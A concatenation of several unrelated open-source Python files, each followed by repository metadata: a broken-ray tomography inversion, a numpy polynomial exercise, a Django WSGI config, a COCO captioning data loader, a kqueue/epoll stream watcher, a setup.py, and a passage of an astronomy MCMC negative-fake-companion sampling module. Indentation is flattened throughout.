def _Del(m):
return int0(npmatrix(diag(xrange(1, int(m)), k=1)[:-1]))
class _CD_RPN:
def __init__(self):
self.coeffs = [(npmatrix((-1,)), npmatrix((-1,)))]
self.rpn = [(rpncalc.RPNProgram([-1]), rpncalc.RPNProgram([-1]))]
# In case this class is utilized by multiple threads.
self.lock = Lock()
def getcoeffs(self, m):
# Returns coefficients for $c_{m}$ and $d_{m}$.
# If they already exist in cache, just return what is there.
with self.lock:
if len(self.coeffs) <= m:
# Need to generate coefficients for $c_{m}$ and $d_{m}$.
# Fetch the coefficients for $c_{m-1}$ and $d_{m-1}$.
C, D = self.getcoeffs(m - 1)
if m % 2: # $m$ is odd
C_new = _E(m) * D * _X((m + 1) / 2).transpose() \
- ((1 + m) * _E(m) + 3 * _X(m)
+ 2 * (_E(m) + _X(m)) * _X(m - 1) * _Del(m)) * C \
* _E((m + 1) / 2).transpose()
D_new = _X(m) * C - (m * _E(m) + 2 * _X(m)
+ 2 * (_E(m) + _X(m)) * _X(m - 1) * _Del(m)) * D
else: # $m$ is even
C_new = _E(m) * D * _X(m / 2).transpose() \
- ((1 + m) * _E(m) + 3 * _X(m)
+ 2 * (_E(m) + _X(m)) * _X(m - 1) * _Del(m)) * C
D_new = _X(m) * C - (m * _E(m) + 2 * _X(m)
+ 2 * (_E(m) + _X(m)) * _X(m - 1) * _Del(m)) * D \
* _E(m / 2).transpose()
self.coeffs.append((C_new, D_new))
return self.coeffs[m]
def __getitem__(self, m):
n2 = rpncalc.wild("n2")
v2 = rpncalc.wild("v2")
mul = rpncalc.rpn_funcs[u"⋅"]
add = rpncalc.rpn_funcs[u"+"]
# Returns RPN code for $c_j$ and $d_j$. Generate on the fly if needed.
with self.lock:
while len(self.rpn) <= m:
cm_rpn = []
dm_rpn = []
C, D = self.getcoeffs(len(self.rpn))
# Generate RPN code for $c_j$ and $d_j$.
for row in array(C[::-1]):
npoly_rpn = []
for coeff in row[::-1]:
if coeff:
if len(npoly_rpn):
npoly_rpn.extend([n2, mul])
npoly_rpn.extend([coeff, add])
else:
npoly_rpn.append(coeff)
elif len(npoly_rpn):
npoly_rpn.extend([n2, mul])
if len(cm_rpn):
cm_rpn.extend([v2, mul])
cm_rpn.extend(npoly_rpn)
cm_rpn.append(add)
else:
cm_rpn.extend(npoly_rpn)
for row in array(D[::-1]):
npoly_rpn = []
for coeff in row[::-1]:
if coeff:
if len(npoly_rpn):
npoly_rpn.extend([n2, mul])
npoly_rpn.extend([coeff, add])
else:
npoly_rpn.append(coeff)
elif len(npoly_rpn):
npoly_rpn.extend([n2, mul])
if len(dm_rpn):
dm_rpn.extend([v2, mul])
dm_rpn.extend(npoly_rpn)
dm_rpn.append(add)
else:
dm_rpn.extend(npoly_rpn)
self.rpn.append(
(rpncalc.RPNProgram(cm_rpn), rpncalc.RPNProgram(dm_rpn)))
return self.rpn[m]
class Sderiv:
def __init__(self, alpha):
self.alpha = alpha
def __call__(self, A, ds):
H, W = A.shape
psi = rpncalc.decode(u"« x 3 ^ 4 / +/- 3 x * 4 / + »")
N = ceil(self.alpha / ds)
X = linspace(-N * ds - ds, N * ds + ds, 2 * N + 3)
Psi = psi(x=X / self.alpha)
Psi[X > self.alpha] = psi(x=1)
Psi[X < -self.alpha] = psi(x=-1)
stencil = (Psi[:-2] + Psi[2:] - 2 * Psi[1:-1]) / ds
diff = conv([stencil], A)
return N, N, diff[:, 2 * N:-2 * N]
class PolarBrokenRayInversion(parallel.BaseTaskClass):
_cd = _CD_RPN()
_u = rpncalc.decode(u"« q phi sin ⋅ arcsin »")
_v = rpncalc.decode(u"« q phi sin ⋅ +/- q 2 ^ phi sin 2 ^ ⋅ +/- 1 + √ ÷ »")
_w = rpncalc.decode(u"« i phi u - ⋅ exp »")
_tm = rpncalc.decode(u"« i dm ⋅ n ⋅ cm v ⋅ + dlnr m ^ ⋅ m 2 + ! ÷ »")
_cf = rpncalc.decode(u"« dr r ⋅ v 2 ^ ⋅ phi csc ⋅ s 2 ^ ÷ »")
_invlock = Lock()
def __init__(self, Qf, Phi, smin, smax, alpha, nmax=200):
# Parameters:
# $\mathbf{Qf}$ -- $\mathcal{Q}f$, sampled on an $r\theta$ grid.
# $\mathbf{Phi}$ ($\phi$) -- Scattering angle
# $\mathbf{rmin}$ -- $r_{\min}$, defaults to $1$.
# $\mathbf{rmax}$ -- $r_{\max}$, defaults to $6$.
# $\mathbf{D}$ -- Numerical implemenation of $\frac{\partial}{\partial r}$.
# $\mathbf{nmax}$ -- $n_{\max}$, reconstructs $\tilde{f}\left(r,n\right)$
# for $\left|n\right| \le n_{\max}$. Defaults to $200$.
# This reconstruction will assume that $\mathcal{Q}f$ is real and exploit
# conjugate symmetry in the Fourier series.
# Initialize variables.
self.Qf = Qf
self.Phi = Phi
self.smin = smin
self.smax = smax
H, W = Qf.shape
self.thetamin = thetamin = -pi
self.thetamax = thetamax = pi*(1-2.0/H)
self.nmax = nmax
self.F = None
self.F_cartesian = None
self.lock = Lock()
self.status = Condition(self.lock)
self.jobsdone = 0
self.jobcount = nmax + 1
self.running = False
self.projectioncount = 0
self.projecting = False
self.dr = dr = ds = (smax - smin) / float(W - 1)
self.dtheta = dtheta = (thetamax - thetamin) / float(H)
# Compute $\widetilde{\mathcal{Q}f}$.
self.FQf = FQf = fft(Qf, axis=0)
# Perform differentiation of $\widetilde{\mathcal{Q}f}$.
D = Sderiv(alpha)
try:
clip_left, clip_right, self.DFQf = D(FQf, ds)
except:
clip_left, clip_right, self.DFQf = D(float64(FQf), ds)
# Initialize array that will store $\tilde{f}$.
self.Ff = zeros(self.DFQf.shape, dtype=complex128)
# Initialize $rs$ grid.
self.rmin = self.smin + clip_left * ds
self.rmax = self.smax - clip_right * ds
R = linspace(self.rmin, self.rmax, W - clip_left - clip_right)
self.R, self.S = meshgrid(R, R)
# Compute $q$, $u$, $v$, $w$, and $v^{2}r*\csc(\phi)*{\Delta}r/s^2$.
self.Q = self.S / self.R
args = dict(q=self.Q, r=self.R, s=self.S, phi=self.Phi, dr=dr)
args["u"] = self.U = self._u(**args)
args["v"] = self.V = self._v(**args)
self.W = self._w(**args)
self.Factor = self._cf(**args)
def A(self, n, eps=0.0000001, p=16):
# Compute matrix $\mathbf{A}_n$.
H, W = self.DFQf.shape
# Initialize the An matrix (as an array for now).
An = zeros(self.R.shape, dtype=complex128)
# First compute a partial sum for the upper triangular part.
# Start with $m=0$
mask = self.S < self.R
Sum = zeros(self.R.shape, dtype=complex128)
for m in xrange(0, p + 1, 2):
cm_rpn, dm_rpn = self._cd[m]
Term = self._tm(v=self.V[mask], v2=self.V[mask] ** 2,
dlnr=self.dr / self.R[mask],
n=n, n2=n ** 2, m=m, cm=cm_rpn, dm=dm_rpn)
Sum[mask] += Term
mask[mask] *= abs(Term) >= eps
if not mask.any():
break
mask = self.S < self.R
An[mask] = 2 * self.W[mask] ** n * self.Factor[mask] * Sum[mask]
# Now to do the diagonal.
# Since $r=s$ here, we have $q=1$, $u=\phi$, $v=-\tan\phi$,
# and $w=1$.
mask = self.S == self.R
Sum = zeros(self.R.shape, dtype=complex128)
for m in xrange(0, p + 1):
cm_rpn, dm_rpn = self._cd[m]
Term = self._tm(v=-tan(self.Phi), v2=tan(self.Phi) ** 2,
dlnr=self.dr / self.R[mask],
n=n, n2=n ** 2, m=m, cm=cm_rpn, dm=dm_rpn)
Sum[mask] += Term
mask[mask] *= abs(Term) >= eps
if not mask.any():
break
mask = self.S == self.R
An[mask] = self.Factor[mask] * Sum[mask] + \
array([1 - 1 / cos(self.Phi)] * W)
return npmatrix(An)
def f(self, n):
# This is the function that is run in parallel.
An = self.A(n, eps=10 ** -9, p=24)
DFQf = self.DFQf[n]
#AnInv = inv(An).transpose()
#Ff = array(DFQf*AnInv)[0]
Ff = solve(An, DFQf)
return Ff
def populatequeue(self, queue):
for n in xrange(self.nmax + 1):
queue.put(n)
def postproc(self, (n, Ff)):
with self.status:
self.Ff[n] = Ff
if n > 0:
self.Ff[-n] = Ff.conjugate()
self.jobsdone += 1
self.status.notifyAll()
def reconstruct(self):
with self.lock:
self.F = ifft(self.Ff, axis=0)
return self.F
| shersonb/brokenray | brokenray/polar.py | Python | mit | 11,050 |
import numpy
arr = numpy.array(list(map(float, input().split())))
x = float(input())
value = numpy.polyval(arr, x)
print(value)
| avtomato/HackerRank | Python/_16_Numpy/_14_Polynomials/solution.py | Python | mit | 130 |
"""
WSGI config for photoboard project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "photoboard.settings")
application = get_wsgi_application()
| photoboard/photoboard-django | photoboard/wsgi.py | Python | mit | 398 |
import torch
import torchvision.transforms as transforms
import torch.utils.data as data
import os
import json
import pickle
import argparse
from PIL import Image
import numpy as np
from utils import Vocabulary
class CocoDataset(data.Dataset):
def __init__(self, root, anns, vocab, mode='train',transform=None):
self.root = root
self.anns = json.load(open(anns))
self.vocab = pickle.load(open(vocab, 'rb'))
self.transform = transform
self.data = [ann for ann in self.anns if ann['split'] == mode]
def __getitem__(self, index):
data = self.data
vocab = self.vocab
# load image
path = os.path.join(self.root, data[index]['file_path'])
img = Image.open(path).convert('RGB')
if self.transform is not None:
img = self.transform(img)
# load caption
cap = data[index]['final_caption']
caption = []
caption.append(vocab('<start>'))
caption.extend([vocab(word) for word in cap])
caption.append(vocab('<end>'))
target = torch.IntTensor(caption)
return img, target, data[index]['imgid']
def __len__(self):
return len(self.data)
def collate_fn(data):
# sort the data in descending order
data.sort(key=lambda x: len(x[1]), reverse=True)
images, captions, imgids = zip(*data)
# merge images (from tuple of 3D tensor to 4D tensor).
images = torch.stack(images, 0)
# merge captions (from tuple of 1D tensor to 2D tensor).
lengths = [len(cap) for cap in captions]
targets = torch.zeros(len(captions), max(lengths)).long()
for i, cap in enumerate(captions):
end = lengths[i]
targets[i, :end] = cap[:end]
return images, targets, lengths, imgids
def get_loader(opt, mode='train', shuffle=True, num_workers=1, transform=None):
coco = CocoDataset(root=opt.root_dir,
anns=opt.data_json,
vocab=opt.vocab_path,
mode=mode,
transform=transform)
data_loader = torch.utils.data.DataLoader(dataset=coco,
batch_size=opt.batch_size,
shuffle=shuffle,
num_workers=num_workers,
collate_fn=collate_fn)
return data_loader
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--root_dir', type=str, default='/home/myunggi/Research/show-and-tell', help="root directory of the project")
parser.add_argument('--data_json', type=str, default='data/data.json', help='input data list which includes captions and image information')
parser.add_argument('--vocab_path', type=str, default='data/vocab.pkl', help='vocabulary wrapper')
parser.add_argument('--crop_size', type=int, default=224, help='image crop size')
parser.add_argument('--batch_size', type=int, default=128, help='batch size')
args = parser.parse_args()
transform = transforms.Compose([
transforms.RandomCrop(args.crop_size),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))
])
data_loader = get_loader(args, transform=transform)
total_iter = len(data_loader)
for i, (img, target, length) in enumerate(data_loader):
print('done')
| incredible-vision/show-and-tell | data_loader.py | Python | mit | 3,497 |
from collections import namedtuple
import select
StreamEvent = namedtuple( 'StreamEvent', [ 'fd', 'stream', 'data', 'direction', 'num_bytes', 'eof' ] )
class StreamWatcher(object):
def __init__( self ):
if _best_backend is None:
raise Exception( "No poll/queue backend could be found for your OS." )
self.backend = _best_backend( )
self.fd_map = {}
self.stream_map = {}
def watch( self, fd, data=None, read=True, write=False ):
# allow python file-like objects that have a backing fd
if hasattr(fd, 'fileno') and callable(fd.fileno):
stream = fd
fd = stream.fileno()
self.stream_map[fd] = stream
else:
self.stream_map[fd] = None
# associate user data with the fd
self.fd_map[fd] = data
# prepare any event filter additions
if read:
self.backend.watch_read( fd )
if write:
self.backend.watch_write( fd )
def wait( self, timeout=None, max_events=4 ):
return self.backend.wait(
timeout=timeout,
max_events=max_events,
fd_data_map=self.fd_map,
fd_stream_map=self.stream_map )
_best_backend = None
try:
from select import kqueue, kevent
except ImportError:
pass
else:
class KQueueBackend(object):
def __init__( self ):
self.kq = kqueue( )
def watch_read( self, fd ):
event = kevent( fd, filter=select.KQ_FILTER_READ, flags=select.KQ_EV_ADD )
self._add_events( [event] )
def watch_write( self, fd ):
event = kevent( fd, filter=select.KQ_FILTER_WRITE, flags=select.KQ_EV_ADD )
self._add_events( [event] )
def _add_events( self, new_events ):
e = self.kq.control( new_events, 0, 0 )
assert len(e) == 0, "Not expecting to receive any events while adding filters."
def wait( self, timeout=None, max_events=4, fd_data_map={}, fd_stream_map={} ):
r_events = self.kq.control( None, max_events, timeout )
e = []
for event in r_events:
fd = event.ident
if fd in fd_data_map:
stream = fd_stream_map.get( fd, None )
data = fd_data_map.get( fd, None )
direction = 'read' if event.filter == select.KQ_FILTER_READ else 'write'
num_bytes = event.data
eof = ( event.flags & select.KQ_EV_EOF != 0 )
e.append( StreamEvent( fd, stream, data, direction, num_bytes, eof ) )
return e
if _best_backend is None:
_best_backend = KQueueBackend
try:
from select import epoll
from fcntl import ioctl
import array
import termios
except ImportError:
pass
else:
class EPollBackend(object):
def __init__( self ):
self.ep = epoll( )
def watch_read( self, fd ):
self.ep.register( fd, select.EPOLLIN )
def watch_write( self, fd ):
self.ep.register( fd, select.EPOLLOUT )
def wait( self, timeout=None, max_events=None, fd_data_map={}, fd_stream_map={} ):
if max_events is None:
max_events = -1
if timeout is None:
timeout = -1
r_events = self.ep.poll( timeout, max_events )
e = []
for fd, event in r_events:
if fd in fd_data_map:
buf = array.array( 'i', [0] )
ioctl( fd, termios.FIONREAD, buf, 1 )
stream = fd_stream_map.get( fd, None )
data = fd_data_map.get( fd, None )
num_bytes = buf[0]
eof = ( event & (select.EPOLLHUP | select.EPOLLERR) != 0 )
if event & select.EPOLLIN != 0:
e.append( StreamEvent( fd, stream, data, 'read', num_bytes, eof ) )
if event & select.EPOLLOUT != 0:
e.append( StreamEvent( fd, stream, data, 'write', num_bytes, eof ) )
return e
if _best_backend is None:
_best_backend = EPollBackend
| theojulienne/pyio | pyio/io/StreamWatcher.py | Python | mit | 3,517 |
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
config = {
'description':'End to end solution for bitcoin data gathering, backtesting, and live trading',
'author': 'ross palmer',
'url':'http://rosspalmer.github.io/bitQuant/',
'license':'MIT',
'version': '0.2.10',
'install_requires': ['SQLAlchemy','pandas','numpy','scipy','PyMySQL'],
'packages': ['bitquant'],
'scripts': [],
'name':'bitquant'
}
setup(**config)
| multidis/bitQuant02 | setup.py | Python | mit | 464 |
#! /usr/bin/env python
"""
Module with the MCMC (``emcee``) sampling for NEGFC parameter estimation.
"""
__author__ = 'O. Wertz, Carlos Alberto Gomez Gonzalez, V. Christiaens'
__all__ = ['mcmc_negfc_sampling',
'chain_zero_truncated',
'show_corner_plot',
'show_walk_plot',
'confidence']
import numpy as np
import os
import emcee
from multiprocessing import cpu_count
import inspect
import datetime
import corner
from matplotlib import pyplot as plt
from matplotlib.ticker import MaxNLocator
import pickle
from scipy.stats import norm
from ..fm import cube_inject_companions
from ..config import time_ini, timing
from ..config.utils_conf import sep
from ..psfsub import pca_annulus
from .negfc_fmerit import get_values_optimize, get_mu_and_sigma
from .utils_mcmc import gelman_rubin, autocorr_test
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
from ..fits import write_fits
def lnprior(param, bounds):
""" Define the prior log-function.
Parameters
----------
param: tuple
The model parameters.
bounds: list
The bounds for each model parameter.
Ex: bounds = [(10,20),(0,360),(0,5000)]
Returns
-------
out: float.
0 if all the model parameters satisfy the prior conditions defined here.
-np.inf if at least one model parameters is out of bounds.
"""
try:
r, theta, flux = param
except TypeError:
print('param must be a tuple, {} given'.format(type(param)))
try:
r_bounds, theta_bounds, flux_bounds = bounds
except TypeError:
print('bounds must be a list of tuple, {} given'.format(type(bounds)))
if r_bounds[0] <= r <= r_bounds[1] and \
theta_bounds[0] <= theta <= theta_bounds[1] and \
flux_bounds[0] <= flux <= flux_bounds[1]:
return 0.0
else:
return -np.inf
def lnlike(param, cube, angs, plsc, psf_norm, fwhm, annulus_width, ncomp,
aperture_radius, initial_state, cube_ref=None, svd_mode='lapack',
scaling='temp-mean', algo=pca_annulus, delta_rot=1, fmerit='sum',
imlib='vip-fft', interpolation='lanczos4', collapse='median',
algo_options={}, weights=None, transmission=None, mu_sigma=True,
sigma='spe+pho', debug=False):
""" Define the likelihood log-function.
Parameters
----------
param: tuple
The model parameters, typically (r, theta, flux).
cube: numpy.array
The cube of fits images expressed as a numpy.array.
angs: numpy.array
The parallactic angle fits image expressed as a numpy.array.
plsc: float
The platescale, in arcsec per pixel.
psf_norm: numpy.array
The scaled psf expressed as a numpy.array.
annulus_width: float
The width of the annulus of interest in pixels.
ncomp: int or None
The number of principal components for PCA-based algorithms.
fwhm : float
The FHWM in pixels.
aperture_radius: float
The radius of the circular aperture in terms of the FWHM.
initial_state: numpy.array
The initial guess for the position and the flux of the planet.
cube_ref: numpy ndarray, 3d, optional
Reference library cube. For Reference Star Differential Imaging.
svd_mode : {'lapack', 'randsvd', 'eigen', 'arpack'}, str optional
Switch for different ways of computing the SVD and selected PCs.
scaling : {'temp-mean', 'temp-standard'} or None, optional
With None, no scaling is performed on the input data before SVD. With
"temp-mean" then temporal px-wise mean subtraction is done and with
"temp-standard" temporal mean centering plus scaling to unit variance
is done.
algo: vip function, optional {pca_annulus, pca_annular}
Post-processing algorithm used.
delta_rot: float, optional
If algo is set to pca_annular, delta_rot is the angular threshold used
to select frames in the PCA library (see description of pca_annular).
fmerit : {'sum', 'stddev'}, string optional
Chooses the figure of merit to be used. stddev works better for close in
companions sitting on top of speckle noise.
imlib : str, optional
See the documentation of the ``vip_hci.preproc.frame_shift`` function.
interpolation : str, optional
See the documentation of the ``vip_hci.preproc.frame_shift`` function.
collapse : {'median', 'mean', 'sum', 'trimmean', None}, str or None, optional
Sets the way of collapsing the frames for producing a final image. If
None then the cube of residuals is used when measuring the function of
merit (instead of a single final frame).
algo_options: dict, opt
Dictionary with additional parameters related to the algorithm
(e.g. tol, min_frames_lib, max_frames_lib). If 'algo' is not a vip
routine, this dict should contain all necessary arguments apart from
the cube and derotation angles. Note: arguments such as ncomp, svd_mode,
scaling, imlib, interpolation or collapse can also be included in this
dict (the latter are also kept as function arguments for consistency
with older versions of vip).
weights : 1d array, optional
If provided, the negative fake companion fluxes will be scaled according
to these weights before injection in the cube. Can reflect changes in
the observing conditions throughout the sequence.
transmission: numpy array, optional
Radial transmission of the coronagraph, if any. Array with 2 columns.
First column is the radial separation in pixels. Second column is the
off-axis transmission (between 0 and 1) at the radial separation given
in column 1.
mu_sigma: tuple of 2 floats or None, opt
If set to None: not used, and falls back to original version of the
algorithm, using fmerit. Otherwise, should be a tuple of 2 elements,
containing the mean and standard deviation of pixel intensities in an
annulus centered on the location of the companion, excluding the area
directly adjacent to the companion.
sigma: str, opt
Sets the type of noise to be included as sigma^2 in the log-probability
expression. Choice between 'pho' for photon (Poisson) noise, 'spe' for
residual (mostly whitened) speckle noise, or 'spe+pho' for both.
debug: boolean
If True, the cube is returned along with the likelihood log-function.
Returns
-------
out: float
The log of the likelihood.
"""
## set imlib for rotation and shift
if imlib == 'opencv':
imlib_rot = imlib
imlib_sh = imlib
elif imlib == 'skimage' or imlib == 'ndimage-interp':
imlib_rot = 'skimage'
imlib_sh = 'ndimage-interp'
elif imlib == 'vip-fft' or imlib == 'ndimage-fourier':
imlib_rot = 'vip-fft'
imlib_sh = 'ndimage-fourier'
else:
raise TypeError("Interpolation not recognized.")
# Create the cube with the negative fake companion injected
if weights is None:
flux = -param[2]
norm_weights=weights
else:
flux = -param[2]*weights
norm_weights = weights/np.sum(weights)
cube_negfc = cube_inject_companions(cube, psf_norm, angs, flevel=flux,
plsc=plsc, rad_dists=[param[0]],
n_branches=1, theta=param[1],
imlib=imlib_sh,
interpolation=interpolation,
transmission=transmission,
verbose=False)
# Perform PCA and extract the zone of interest
values = get_values_optimize(cube_negfc, angs, ncomp, annulus_width,
aperture_radius, fwhm, initial_state[0],
initial_state[1], cube_ref=cube_ref,
svd_mode=svd_mode, scaling=scaling,
algo=algo, delta_rot=delta_rot, imlib=imlib_rot,
interpolation=interpolation, collapse=collapse,
algo_options=algo_options,
weights=norm_weights)
if isinstance(mu_sigma, tuple):
mu = mu_sigma[0]
sigma2 = mu_sigma[1]**2
num = np.power(mu-values,2)
denom = 0
if 'spe' in sigma:
denom += sigma2
if 'pho' in sigma:
denom += np.abs(values-mu)
lnlikelihood = -0.5* np.sum(num/denom)
else:
mu = mu_sigma
# old version - delete?
if fmerit == 'sum':
lnlikelihood = -0.5 * np.sum(np.abs(values-mu))
elif fmerit == 'stddev':
values = values[values != 0]
lnlikelihood = -np.std(values,ddof=1)*values.size
else:
raise RuntimeError('fmerit choice not recognized.')
if debug:
return lnlikelihood, cube_negfc
else:
return lnlikelihood
def lnprob(param,bounds, cube, angs, plsc, psf_norm, fwhm,
annulus_width, ncomp, aperture_radius, initial_state, cube_ref=None,
svd_mode='lapack', scaling='temp-mean', algo=pca_annulus,
delta_rot=1, fmerit='sum', imlib='vip-fft', interpolation='lanczos4',
collapse='median', algo_options={}, weights=None, transmission=None,
mu_sigma=True, sigma='spe+pho', display=False):
""" Define the probability log-function as the sum between the prior and
likelihood log-funtions.
Parameters
----------
param: tuple
The model parameters.
bounds: list
The bounds for each model parameter.
Ex: bounds = [(10,20),(0,360),(0,5000)]
cube: numpy.array
The cube of fits images expressed as a numpy.array.
angs: numpy.array
The parallactic angle fits image expressed as a numpy.array.
plsc: float
The platescale, in arcsec per pixel.
psf_norm: numpy.array
The scaled psf expressed as a numpy.array.
fwhm : float
The FHWM in pixels.
annulus_width: float
The width in pixel of the annulus on wich the PCA is performed.
ncomp: int or None
The number of principal components for PCA-based algorithms.
aperture_radius: float
The radius of the circular aperture in FWHM.
initial_state: numpy.array
The initial guess for the position and the flux of the planet.
cube_ref : numpy ndarray, 3d, optional
Reference library cube. For Reference Star Differential Imaging.
svd_mode : {'lapack', 'randsvd', 'eigen', 'arpack'}, str optional
Switch for different ways of computing the SVD and selected PCs.
scaling : {'temp-mean', 'temp-standard'} or None, optional
With None, no scaling is performed on the input data before SVD. With
"temp-mean" then temporal px-wise mean subtraction is done and with
"temp-standard" temporal mean centering plus scaling to unit variance
is done.
fmerit : {'sum', 'stddev'}, string optional
Chooses the figure of merit to be used. stddev works better for close in
companions sitting on top of speckle noise.
imlib : str, optional
See the documentation of the ``vip_hci.preproc.frame_rotate`` function.
interpolation : str, optional
See the documentation of the ``vip_hci.preproc.frame_rotate`` function.
algo_options, : dict, opt
Dictionary with additional parameters related to the algorithm
(e.g. tol, min_frames_lib, max_frames_lib). If 'algo' is not a vip
routine, this dict should contain all necessary arguments apart from
the cube and derotation angles. Note: arguments such as ncomp, svd_mode,
scaling, imlib, interpolation or collapse can also be included in this
dict (the latter are also kept as function arguments for consistency
with older versions of vip).
collapse : {'median', 'mean', 'sum', 'trimmean', None}, str or None, optional
Sets the way of collapsing the frames for producing a final image. If
None then the cube of residuals is used when measuring the function of
merit (instead of a single final frame).
weights : 1d array, optional
If provided, the negative fake companion fluxes will be scaled according
to these weights before injection in the cube. Can reflect changes in
the observing conditions throughout the sequence.
transmission: numpy array, optional
Radial transmission of the coronagraph, if any. Array with 2 columns.
First column is the radial separation in pixels. Second column is the
off-axis transmission (between 0 and 1) at the radial separation given
in column 1.
mu_sigma: tuple of 2 floats or None, opt
If set to None: not used, and falls back to original version of the
algorithm, using fmerit. Otherwise, should be a tuple of 2 elements,
containing the mean and standard deviation of pixel intensities in an
annulus centered on the location of the companion, excluding the area
directly adjacent to the companion.
sigma: str, opt
Sets the type of noise to be included as sigma^2 in the log-probability
expression. Choice between 'pho' for photon (Poisson) noise, 'spe' for
residual (mostly whitened) speckle noise, or 'spe+pho' for both.
display: boolean
If True, the cube is displayed with ds9.
Returns
-------
out: float
The probability log-function.
"""
if initial_state is None:
initial_state = param
lp = lnprior(param, bounds)
if np.isinf(lp):
return -np.inf
return lp + lnlike(param, cube, angs, plsc, psf_norm, fwhm, annulus_width,
ncomp, aperture_radius, initial_state, cube_ref,
svd_mode, scaling, algo, delta_rot, fmerit, imlib,
interpolation, collapse, algo_options, weights,
transmission, mu_sigma, sigma)
def mcmc_negfc_sampling(cube, angs, psfn, ncomp, plsc, initial_state, fwhm=4,
annulus_width=8, aperture_radius=1, cube_ref=None,
svd_mode='lapack', scaling=None, algo=pca_annulus,
delta_rot=1, fmerit='sum', imlib='vip-fft',
interpolation='lanczos4', collapse='median',
algo_options={}, wedge=None, weights=None,
transmission=None, mu_sigma=True, sigma='spe+pho',
nwalkers=100, bounds=None, a=2.0, burnin=0.3,
rhat_threshold=1.01, rhat_count_threshold=1,
niteration_min=10, niteration_limit=10000,
niteration_supp=0, check_maxgap=20, conv_test='ac',
ac_c=50, ac_count_thr=3, nproc=1, output_dir='results/',
output_file=None, display=False, verbosity=0,
save=False):
r""" Runs an affine invariant mcmc sampling algorithm in order to determine
the position and the flux of the planet using the 'Negative Fake Companion'
technique. The result of this procedure is a chain with the samples from the
posterior distributions of each of the 3 parameters.
This technique can be summarized as follows:
1) We inject a negative fake companion (one candidate) at a given position
and characterized by a given flux, both close to the expected values.
2) We run PCA on an full annulus which pass through the initial guess,
regardless of the position of the candidate.
3) We extract the intensity values of all the pixels contained in a
circular aperture centered on the initial guess.
4) We calculate a function of merit :math:`\chi^2` (see below).
The steps 1) to 4) are then looped. At each iteration, the candidate model
parameters are defined by the emcee Affine Invariant algorithm.
There are different possibilities for the figure of merit (step 4):
- mu_sigma=None; fmerit='sum' (as in Wertz et al. 2017):
.. math:: \chi^2 = \sum(\|I_j\|)
- mu_sigma=None; fmerit='stddev' (likely more appropriate when speckle
noise still significant):
.. math:: \chi^2 = N \sigma_{I_j}(values,ddof=1)*values.size
- mu_sigma=True or a tuple (as in Christiaens et al. 2021, new default):
.. math:: \chi^2 = \sum\frac{(I_j- mu)^2}{\sigma^2}
where :math:`j \in {1,...,N}` with N the total number of pixels
contained in the circular aperture, :math:`\sigma_{I_j}` is the standard
deviation of :math:`I_j` values, and :math:`\mu` is the mean pixel
intensity in a truncated annulus at the radius of the companion candidate
(i.e. excluding the cc region).
See description of `mu_sigma` and `sigma` for more details on
:math:`\sigma\`.
Parameters
----------
cube: numpy.array
ADI fits cube.
angs: numpy.array
The parallactic angle vector.
psfn: numpy 2D or 3D array
Normalised PSF template used for negative fake companion injection.
The PSF must be centered and the flux in a 1xFWHM aperture must equal 1
(use ``vip_hci.metrics.normalize_psf``).
If a 3D array is provided, it must match the number of frames of ADI
cube. This can be useful if the cube was unsaturated and conditions
were variable.
ncomp: int or None
The number of principal components for PCA-based algorithms.
plsc: float
The platescale, in arcsec per pixel.
annulus_width: float, optional
The width in pixels of the annulus on which the PCA is performed.
aperture_radius: float, optional
The radius in FWHM of the circular aperture.
nwalkers: int optional
The number of Goodman & Weare 'walkers'.
initial_state: numpy.array
The first guess for the position and flux of the planet, respectively.
Each walker will start in a small ball around this preferred position.
cube_ref : numpy ndarray, 3d, optional
Reference library cube. For Reference Star Differential Imaging.
svd_mode : {'lapack', 'randsvd', 'eigen', 'arpack'}, str optional
Switch for different ways of computing the SVD and selected PCs.
'randsvd' is not recommended for the negative fake companion technique.
algo : python routine
Post-processing algorithm used to model and subtract the star. First
2 arguments must be input cube and derotation angles. Must return a
post-processed 2d frame.
scaling : {'temp-mean', 'temp-standard'} or None, optional
With None, no scaling is performed on the input data before SVD. With
"temp-mean" then temporal px-wise mean subtraction is done and with
"temp-standard" temporal mean centering plus scaling to unit variance
is done.
fmerit : {'sum', 'stddev'}, string optional
Chooses the figure of merit to be used. stddev works better for
close-in companions sitting on top of speckle noise.
imlib : str, optional
Imlib used for both image rotation and sub-px shift:
- "opencv": will use it for both;
- "skimage" or "ndimage-interp" will use scikit-image and \
scipy.ndimage for rotation and shift resp.;
- "ndimage-fourier" or "vip-fft" will use Fourier transform based \
methods for both.
interpolation : str, optional
Interpolation order. See the documentation of the
``vip_hci.preproc.frame_rotate`` function. Note that the interpolation
options are identical for rotation and shift within each of the 3 imlib
cases above.
collapse : {'median', 'mean', 'sum', 'trimmean', None}, str or None, optional
Sets the way of collapsing the frames for producing a final image. If
None then the cube of residuals is used when measuring the function of
merit (instead of a single final frame).
algo_options: dict, opt
Dictionary with additional parameters related to the algorithm
(e.g. tol, min_frames_lib, max_frames_lib). If 'algo' is not a vip
routine, this dict should contain all necessary arguments apart from
the cube and derotation angles. Note: arguments such as ncomp, svd_mode,
scaling, imlib, interpolation or collapse can also be included in this
dict (the latter are also kept as function arguments for consistency
with older versions of vip).
wedge: tuple, opt
Range in theta where the mean and standard deviation are computed in an
annulus defined in the PCA image. If None, it will be calculated
automatically based on initial guess and derotation angles to avoid.
If some disc signal is present elsewhere in the annulus, it is
recommended to provide wedge manually. The provided range should be
continuous and >0. E.g. provide (270, 370) to consider a PA range
between [-90,+10].
weights : 1d array, optional
If provided, the negative fake companion fluxes will be scaled according
to these weights before injection in the cube. Can reflect changes in
the observing conditions throughout the sequence.
transmission: numpy array, optional
Radial transmission of the coronagraph, if any. Array with 2 columns.
First column is the radial separation in pixels. Second column is the
off-axis transmission (between 0 and 1) at the radial separation given
in column 1.
mu_sigma: tuple of 2 floats or bool, opt
If set to None: not used, and falls back to original version of the
algorithm, using fmerit (Wertz et al. 2017).
If a tuple of 2 elements: should be the mean and standard deviation of
pixel intensities in an annulus centered on the location of the
companion candidate, excluding the area directly adjacent to the CC.
